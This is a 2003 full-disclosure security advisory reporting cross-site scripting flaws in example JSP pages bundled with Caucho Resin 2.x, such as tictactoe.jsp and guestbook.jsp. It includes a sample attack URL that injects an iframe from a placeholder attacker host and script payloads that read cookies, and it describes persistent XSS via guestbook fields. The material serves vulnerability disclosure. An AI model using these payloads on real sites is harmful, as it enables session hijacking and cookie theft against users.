- EXPL-A-2003-026 exploitlabs.com Advisory 026 -
-= Caucho Resin =-
Donnie Werner
Oct 18, 2003
note: this is not
http://www.securiteam.com/securitynews/5KP0O1F7FM.html
http://www.securitytracker.com/alerts/2002/Jun/1004552.html
Caucho Resin Httpd 2.x
http://www.caucho.com/sales/customers.xtp
"Resinยฎ is a cutting-edge XML Application Server.
It serves the fastest servlets and JSP."
default port 8080 ( others used )
affected scripts:
env.jsp
form.jsp
session.jsp
tictactoe.jsp
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
IPT>
the above is only an example, all cookie and session
stealing Cross Site Scripting was possible.
guestbook.jsp allows persistant XSS
enter evil javascript in "name" and "comment" fields
it is then re-rendered upon revisit
nay
yeh
Versions 3.x dont have the examples included
[email protected]
Concurrent with this advisory
Donnie Werner
CTO E2 Labs
http://e2-labs.cpm
[email protected]
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html